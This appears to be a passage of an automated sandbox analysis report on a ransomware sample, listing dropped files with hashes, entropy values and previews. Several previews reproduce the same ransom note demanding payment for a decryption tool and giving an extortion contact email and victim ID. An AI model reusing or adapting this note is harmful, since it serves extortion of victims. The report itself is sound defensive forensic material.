                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1802
                                                                                            Entropy (8bit):7.879027154265616
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:ZSQU7sg/Yk1aI9KESQPWnQgdbKs91rdIkw83p1:esggzI9316Qglz9xX3p1
                                                                                            MD5:BCF87C0A813CD0DD5F1E42B75940E9EE
                                                                                            SHA1:9AAE185F682F917E88BC56B79DC800ACB4E22B6E
                                                                                            SHA-256:574868AC686BDFB137D91FE8B648CB4A557A470148EEF87A6E402158EE9ACFF9
                                                                                            SHA-512:E37816DD6938E09F03FBDECBD265B6BCD256400FCEC152C358267E4D029ACC5C8F37840009492F4218428520F394582C7CBF7BBDCA7B271EA916821B6E77CE09
                                                                                            Malicious:false
                                                                                            Preview:.].b.#..k/.3....E..).."/.......Y<i`...:....z.]2~.....[..vHR#.S.=4....7.......I......-...<&..X.mU.Kmd.{.q.<~...LG..%........(bd.K.!..E..i..8..U.D.)........].j6.!.N.|.......}...nD._.Q;..../.W.../.<..`...(bC.7+..'..aE.V.@w.-6....4.....|.<....P0C.9g.S<.f...&.m..-.h]......j.;A.t..^......v.R..!To.b R@.N%A...0.g5+.4.R.E..1.P.......she...#........j.3m.........:...63.[,w...`..us.'.$zU.1<.<./.&|.......bc...M.aQ...s.#J<....~2.`.%=.e.fu....6M.?.(.>....k.#.n.gV..M..b...?.t.....P;G7..m.z...M..T.#.....a..P..K..X..}.....n...E-w..Ci.\O-E..3...\..f....N.;C...u....&...|O.'.......k....X.....8=n..Uqia.[.2hj.d...R&..;...mh.<.J...e..A...}`.........#P%.........j.U..;..(...f....%.....R.......o~.z~&.\.Mg........b..5..0gN....2..M..3.nG..-7;x....1.R?.VT.{Fu.W"...e.0^.?IF>...yZ..../.......4....^...42....A...5VY.=....5L....F.a'.w....6.(....AGA.'....Mk.......&V..U]Q.........<...m.+...>..}3.\.....r.@.....>.1.hn.w........P....[.KN..........GK{.f.c%.+6T..%...g....'N...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):5898
                                                                                            Entropy (8bit):7.453565517818532
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:ZFr7dX5c30sZi8YaBEOJn3yf5sx4UZRpj6pJEZWodR0bo:ZFr7LE3Zi8HBFJyAjOJEYodIo
                                                                                            MD5:D064CF49C6BF9673275E530D6F9855F6
                                                                                            SHA1:CAB32616FC3147781539E05C467D6D7C0613C995
                                                                                            SHA-256:C834DDB2B1E4BE039ADBCBFBBF2DC857AAA743350B18B49E979928FA6E5DC714
                                                                                            SHA-512:A5E90A141B116103B9D1385AC147B3902FD989BB28CD794B8BACD71083F27626B7D402F8D356862EA61E58F2C210DF963C61F5BE840891D569887F6A66C21E4B
                                                                                            Malicious:false
                                                                                            Preview:.../.E..]......'..?..5..v..Z.B...)]z...dbJc...LEj.2...E.*.tp...#d.r#....]nx<.....y..r.:..h.4....;}.D@.s.<+...M.h....5.u.;.9C[.A.F...(-.h..zs..Z....EF...'.n.:.<....=....H.1...l..Qe'..t.^...#.#.z4..!..>Pj[.-......|_.wD..Atz.],wU.P..*..m.@.wa...*...g3...p.F.b."..}.op.C...z.b.ng.*.,y..$..v..B......HT?.)]F....Ww....K.#.{......Q[.;|.C...X+.F...y...........V.6d1S.....9.s#VA"...b.G&......IE.m....$Z...1..e(....;...B...m.O9.!vw!P.$R.<.E.ry|*...S.kB.#.uw9.|.......US...A...%.!.6.[.5?..Z.j....Y..~....!..*...7m....8..uTH....M.D.d..v.2....t..)...7..p.M0O.I..K.:=....f.|<..-3D."..&).z[..aK..b...F.!..EU..5....*.P.6...kU.1ff.k....x5.p...".8.C_.o.....x......h...e...IP.V}...1.J.W..U.rr.:<..M.....;/+.D..........q(.....{r...\....8...|.T..[.......N%.C..j...m...xa...qG....b...&...V.cW...+B#.[VlG.~.L..d....'.\y.8.[.(}w.Z.].U#.l...d.....Q..=.Z.....N.wp(CKV.$........M_.~4~..={I.o|.06.hg3).......Dn....[Mj.)....V..F.....p...YS..%.~.v6..L..ys.bQ(*./?...I}../..pz.*
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.828616978481137
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AyHfQ0DexbSvEiLCpookRGY0E4xeIxBdJLZRoTOrINiSu0/15vIBm+SMMotoHn9a:AyxOpDPAIxBdDRo2WzvIclMbAnN6
                                                                                            MD5:3B3BE1E94434D9104C454C8B372AC15C
                                                                                            SHA1:BEFFB256869840F0E988E18D4DF2934B4FF2E96A
                                                                                            SHA-256:B69127B5EC362392142C1DF973383FA347986A61AC1C358C26C8C069A3678DF5
                                                                                            SHA-512:98191162C16D00EC572194CD707A68B7830BDA5F7F0D4DEB49835639E7BFBCDA2068B1A981C844EF162F341F38B47470578488A1439FDF62CB359A404844DE6D
                                                                                            Malicious:false
                                                                                            Preview:F.;"^7.. S(.C..... .#.p....'...l...8xD...... .#.mNS.#....HR..y.J.hd...m....v.U..:...>l........,...kQT......xdl$..b...}..%M......d...J...k...,`...N.a.B......O..p...!.t.....3....E.!.&d..T...}`$B4.-F.^.e......+.IQ)..6..(.u}.U..`U...G............D.\j.N.O...Z.}..FR...."..I...j..Ti..B.;..e.2W.V..;....u<.<q,.......|`e.T3...8.*....-.p.....w=..N... .*U..ek.!U..p........../.....n....IuY..........3..g....A.g..Q.<x..+..6.G..1Ff.oO..#F..1..."...V?..LL.f..*...G[.x#.h...N.A.j3.F....G4hV...@.@.Gx....1.G.q.s_5..0.{..).m......\........U.$.?......1.+......y.U}...4....k..l}OZ..` [0I.Q..H.s7{.....H.+.f..Rj...D.vU../\..k..y6..2...Inl.Z]..3...%.......IK...:m.D.....s.g...G...q....B2%.Q..z0..E.C.MtL.Mx...jIQ.^....S..XU)d..+.c.......}MWH..z=S{.gC...6...}r.4{l..J...#.......t.`0...>!..&.jd..3.o.}...rx.X...5..0..L..]..n........t...]b.x...Q{..!j~.^.,?..Ew..i....Hf...V6.l..^.Cl...x.Qn-..d..mS..Y[.)...{.pN.V.'.$`..H..!S.^.%.z....Kk.h=K-*L...v.\EB.B.V.0cc........8Bm...!...L
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8360934661907375
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:xZHw6yr47iCzgQmzhk5zAl90Jipyq6eibFfOp4H/GqObTL/3LPCvkvgTUeu4l6:xZQ6yr47iPBzOzI90Jipc/fFGdbfPLPp
                                                                                            MD5:2BE9E5F67C64617AF2C0086198A39309
                                                                                            SHA1:D096F1BF74CD5D81A2BB852D2CE70B4F620FF0FF
                                                                                            SHA-256:474F5A9A0AA752E15E5BAFCAB6FE74CE3D921F6C8A6C31E6D1BEDBECD7E1CEFE
                                                                                            SHA-512:C7FC09195F6F269556D8A0F779FB2339857667924B7925D4A41F989BC79C74DC5FC99CAC81190EF0B3740E666B0254F45F4417B9457CCB5DC2EB2590B9078F65
                                                                                            Malicious:false
                                                                                            Preview:g...P..G..uB......".]........E.5..tQx......O<.....!..O.l_.....z.)......k.uN\.l.....eq.r..&.T..F..2....qN.%...b.`;.^.K...ET.AZ......b|ys...EW..9.S...).Wua......HZo.....H.L.s!t<..(.Bz&a/...=........\+.|m.h..MP..4.x...@3..q....(J.}.a...#!.....,...7.-1.4....c0$.cZ.....28I....`....c.q)28..........2..-..$..T...iC..Dn..h@JE..j%0.....w..o^...W,....l.j.m.m.jhfh.....1w......t..0.#..Q.7.\.V.=..~.(V<lA<h/.,..,.LVX....{>2..4....LU8.H.~.F/...b..1%M..Q.wf..o).V){-.s......^ji....W..a....;..{...e6...1.zo@...&..,:{.|...R.J.......J..@...l.\>r..:."..7......Z.}fRw.&.....S.JHR.B#...?....gT?.1.qU...J..>..O..:,.T'....."my...wr.D .C.g..U(_ic.}!.a.".r...3K...Yd..W.....W.....1.tp.c.....G.;....l..S........'....cQ.ce.8#../..|...sJh.V.nN.E2;+..?...J.(<.......&4..m..:%...!?.)lF..3.w.'.e..9..?........W....e....]%.Nv.O.........n.=.V_.s3<.}.]5I.o..".q..b...../.......M...K..>..6\..........B.\..t!.V......v..~Z..}......|'.....;.D..V......#....>L.;%....?..u.G-.......!UQ
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.831722590993755
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:1JVwB8kI24RQxRI7BwSRx9B3ariRj/uGIROP+fuqlGUeJK5x7WHF72:1dn2SQxR+BZJI0/GgjJKP722
                                                                                            MD5:A89D335B03EEC1843D2C6A2FCE1B4332
                                                                                            SHA1:B69D6989696DCC6732738EF5B3E9FD9D8EB02A17
                                                                                            SHA-256:0227573B844D873771BB4D8160741FC08FBE226B6B084E9025CD03FB7B6BC592
                                                                                            SHA-512:98458A6FD0639BFEEB25951FDE148B7006F55C1FBFE2976C6C5D075B8EAD93374C7AA16CDE3B2C064E740D0E16A0C3DFEFCEF287C944D15A598117C3FCBBBCC5
                                                                                            Malicious:false
                                                                                            Preview:.O..3b..Lxff........C<....Q...83.<.]<....M..I./v.-.t....[.P7.2S..{W..@.E..L.m...Bu.M....R.../$.tG....w.JP.....Of...........c...i..F...){..Y..;H.i......*F.O.'-g..W..;H..BUO.%.7*....!....4.z...Y...0g...{[...8I.P.t.....<..'.._,..RA..g6....X..v.DQ....W.)W.>X._zq.8..H..j.:.....8?.n.}l(.O.$..^ic....6.."..e_?".._..F]]....l.........$-..g....ri.....4DYP}.2....S*....^..C.p1..>...n/....b..Qb..J..J.d.F......P.....,$..7J4].......gw......;...XL....T..0...KL...7...../..@>.NV....d...FV.LaV..$..#)...b.e...J.o?.V..{.A<......SG:......C....e[EBK..-.T?J7....m'.M.i6RX.GD....!./......OG...[e...Y.&.~.C.[.;._.&.}..I:x.../<m.bM7BS......q.,.66.5z.......L^.E{....s.V.~.c...9................"~.N2......;......&,.?.+.I....;......+.....p.-.1K...8..... ...x(..AX:0......#}X..0...(.%.A...f.;.Y&K...\..af...1...i.Bi4..M......9 .@]R..}E[...XP...\.M.l...~..Cy.:......Wy?.N......DB|`-......C|.j......L...@.......C.y....G.?.vE.........&..".'^F....v...7....GF.u..+w.ub..F...<.."s.Se
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.847250900025851
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:B52gpMG3K525JwYcUGcl4n1FOWKIBkHpS99ksLCx7SglmMKvMbuJGJH:PnpCUJ7ucy1FOWLkJS9usuVSS/aIh
                                                                                            MD5:F5CB9A32471258EEAFDD9792EF25AD4E
                                                                                            SHA1:DCD34B65800381848E142B2692762B7915F1B816
                                                                                            SHA-256:8F25AE49E47F1EECEEADA978A1C2D14B4896F885DC038AD3031CE5C3D1DA6041
                                                                                            SHA-512:616CB6A9A0EBB8B5EC5F59F47FAE1C60AEA0B933220730A04E877DE6C33DAE731A78BF0156F12D961852490289E6D7CA6A769D437CFA6B324203C2F34A1C9496
                                                                                            Malicious:false
                                                                                            Preview:.......-C.6_[.Rt.qE...G.j..Z..(..!.gH.E".t.w...)zGXg..l.3....i.#..)..3.K..\4...x..b._..t..<.h ...].J....9%.z...L.'Z...fpO8...'.=.y[....+...+M...EN.=... ..!.B.n/. T..,2m...>..X.w.fC1a.."t?..D..u..Y....K.#..Fd.QUW..)n}<O.......g."M%s...W(....1.6.|fZ...\.JY...o..*...8.4..3.{..3....-..#..x.N...ptu.@)=..Dr...f.......K......v.....a........^.@....uV..O!.{.......eM....E.i"E....]...B:>Pz..j6./T..w%\.....7..E.`..^.6...).......6..Ew...=*....7.j..Me...8d.n........\J..:.+z.N.;i.4VO.f.}..O\{.:..5s.8a/....3..X.X.4b...8n<*#.....,..i.A.T.Jnd/x....q.>.k...i.H......'..l..5.....%.x.A...W....w......c}...B[.7.!~...tH_.+*.|..>.+;...2@...;..jO...s?.Rv....S......S.I3.]..I._...V(<$..Q.K.........U..N]...p.*_n...DR.>.,.J+...;..s...Y.5}..X..1.......m..*...$.:.j0........>2;.Xw.....+.....n>..*..|-.>.@z....`.Z.FX^q@.$sPa..p.u}D....../!....$..z.xu9..ES.........r.;\a/.....b.....]..&'..K..>j......lp...._p..e..Y}..<...y..Ht._.F]...e{.<w,)[.]u...].N..).......%..A.Z*-..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.825893419138719
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:pND7DuaYEw4nQCL61fOosfH/1cuoRbzgZlKXjpujSecSksBjy+rcPqE+utK7:vuBEvPjvybEZqpqbPBjtrcCEFtq
                                                                                            MD5:F7CA49F478C0D4AAF1638EC5A2CC55AE
                                                                                            SHA1:3EB62EF75AA777CE0119AE25EF840C38EB0B8EA9
                                                                                            SHA-256:B82140F612ED51D37FDD974991F4E958E49D4ED0ADAB3D59301B3B855A024DE4
                                                                                            SHA-512:761C5C94DCD8D6B7B2275EF4927596F57EB3B459776E78A2A6C67B4E4D34A4D0672AAC93D97EB9AC7F5142B6A13D6C9C0E775B07E33B4DD5B861F04B507367FD
                                                                                            Malicious:false
                                                                                            Preview:3.#.(...|.....,`......{z.-!.Q%c...u.k........6N....Jh..)..t..X..m..N...Y.cG.)..W...c1`$.-a.*....G..>..>..@.$/...$.. -...............t.^.%.{."..t........#.\.I.G..../.]...3%..!.1...6.N......y]..k....B.....!0....j<a......e..*..foV.6au......../...d..o?...?}.C.;m.3]0...s".W.F..v/.V;&....5.K.8.-..Tss.\.-......%.Z..... ..ld..,]...o.;......7..6.5.*..J~...;....l+...>U3....d...G....ru@!..C.T.q...u.....0&.......M..........J...5:....+...X.$.6..r&.:..7.`.w..*H.n-...F......M.x.i.8(4.. .P..M.-f}..+.x..F..$.....b#....ZKw.k0x..........LK.>...9V.....J...).......F....$8...;.4_.....4..............-...|C=_......pf.c...WS........_vC..54.............10l.......s.........=.K.+....4.?Co7.]K.\@U.?.E.pPa...\!.!@[..J...%Nh.e..0....C...K........[.LX..Ts/.....@.1!#.........Sg..]...-...N..r..$1X.....' x..sG.....o_.`..d-....C.M$....t.%....u.......m..`r..*..o.-~.R..X..Ls....x{.....w...x.MQ9d.\..^....%.^..>...}..13..N.3.?Mr.}...j...i.l....t..##...HF3..-.g9.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830587405795095
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:rF0wK+ymCEoVYbJs/xcCCzERPVkHSEqblxJlFgdRMR0ltBUv:qZ+g6bJs/WMRyyv5bgdRIsev
                                                                                            MD5:CD0AF10A86DD3C047C1E82ACEF72664D
                                                                                            SHA1:107797067FB45A68227685E05D57087C1D705430
                                                                                            SHA-256:52E8CF2FFCBB594421F3F785B6E7529854C6B73449EE80A66CBB92FE13705A97
                                                                                            SHA-512:D941E2DCE31F6F711CCF24698926700F80C0A16256773EE1C4499BDB8DB26F22B86068BAB06FC422A9E283CA3901A0B22F2DD18BDC48603E3A01F087DBEBA75C
                                                                                            Malicious:false
                                                                                            Preview:.A..f..G.vE.Q..........3...[.b].Bw...w|...%.l.$..93cT.`............"...I..T?..h..\.R?zf..L.....X|3..AE.T2:.Y..K.?U4.'..+uN..!4.?K.....({.!C...vc%.F.:...?....~R.....%..9...&D.L.5....].i..x.n. .k.P.v..r.]*.[..%...>......S.V&..Z0X,..:.LQ9..O.sp..P..r.-7V.)...z..`.k=..2..I*~..H..G.[.v.H.o....i.El.O......$q6.[....{P...-..,...~....x?.o.y.P ..u...du^......0M.....;.8.Y.....v.+B..H.Q....&..._C.n%.@.v.X.)T.P.U/.h..-...7UN?Q,.e.yM..Gr.....*<7.m9....-t...A.2Qh......23JAL4...pU..R9....z......L.a.r..].S.F..$k...3..(....7.<.o.=I....f.0..H4h1.dM#;u.J..o.........!3^..#.%s..{...e..&%.R...]...h...".PAZm..L.d.."......bT...iB..$N.I..Z).V_t...z...4..........b.O...f!<.....D>..V..\=...vI~.....r.k..."KN....UP..hH..:..;.....c.P.N_A?&_..*........w[M..g...q.V..H..u....w@MaK3I80Q.*~Y.5N.d;..i...P..O.72.+..{..3./;.,..........i.sN..0h..!....;Z5/.\.n(....D...h..j.....q.@a.my.m.}&N..R..HC8b.....fSZ33.:eQ..W...}..r..%.!.....3[.*...F....n+..f..T..m1<+..{...^-.......7
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.854376041142092
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:snGsRE1kDKXAfkWABNec+898VaemzvUPxsMEybFGBwMrjc27ymiOpO0Rfi1Eo75Q:tPkDKQUNe5FkzUPxsMEybFGBwM3b7LjF
                                                                                            MD5:405FCD03A30B62D214C5964BE6889476
                                                                                            SHA1:50DDAE5C35091D6985ED6EDE795F06C8BCC58F00
                                                                                            SHA-256:C3513D092F5C4FA9CCF9C7F93E50311F5C2659E53FE734F7F4D4CF302181480C
                                                                                            SHA-512:7F614DF9D2DF2B3952D6495F3BF02BC44291EDDC318939C92D40B86E7EB886588D8A74364845046FD0EC945D824C6FA293167F21DE9539D57BC7AB45E2BB5454
                                                                                            Malicious:false
                                                                                            Preview:o.f.[..I{...W.c..f.o."[.J(..D%..s...f..Y.J"..?...&.-.a..^..T..P}6Y..'..k.8vd+....t.3...........8..p.}v..bB.L.ec.."F.t...1...._.x`.....Ij9...^>gZ(..Oc...=.."q.ytc0.5...wgd|....T.6..Jo..K.{..7&.F..@..7..i...J.b.g!.^.H.Y...6Tk...@.....t..p...%d...ee.]'..?....LW&...(jk<./`vgp.=...9!.5........A............LK9b......O)\.a...w...#..6F.....kQ.Cu.....3i]._..Zk./t...F..".b]X+IF...OM....r.@.6..X.1.7:(...a.]....>} .C.C.,gL...f.....F0+..k....;Jn...U.`..R-..S;MOI.aT.Km.9......qp...`.H..#..#...:.2I......'..V?A|m 6.. .8&...m...iy..-z..-....$..y.B.....8...N.>..r............m.9\..g.!......b.......^.g..:[*zL...2.....V....R..A...4[.P2......A%N}..%.o....c.Bqy....5G.[.p.....U<..@...XU..-.n..4.p..).te...T ..*.)..o.-..H.A3R**..=..(.%<R....9d...f...V.3Q..`..5.... ...q..v....x?ta%.d....H!A.&.lg1Dzu..r.....KB2.(R...w{...@...W...N..C"m".oE..H.\....J..i..w.....K....d.....A..h..|q....q)~Y........pD....-..}.0k..'w./...n.7x7.4.....oF.r...n..6.\..s..4.q.S.O.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.850359897184735
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:/zzNVtU1OCnAxeW2Q/fhqNvHfYdkJZynSSqqqEX8mPzIc27PbVrcnXZFdb07kaDF:/btUEuAIW2C0XhJgSSqQpA7BcnXZr0bh
                                                                                            MD5:A16A401DFA3612CBBD103BDE1F3A703B
                                                                                            SHA1:DDF2E099D190EAA967A886087B0E19F8CC562248
                                                                                            SHA-256:FBF64CF442CFD333D42B6C34576B851C9AA28CFE053A6391CB49783FA62A5A90
                                                                                            SHA-512:BED96568225A6A4287089FB0880AB2095C184ED6614B0EAD7903E1897A61139809D434FBD8934597D4DDF44BB89515D00991DEC820FAF20C23DA5B638DAA84DA
                                                                                            Malicious:false
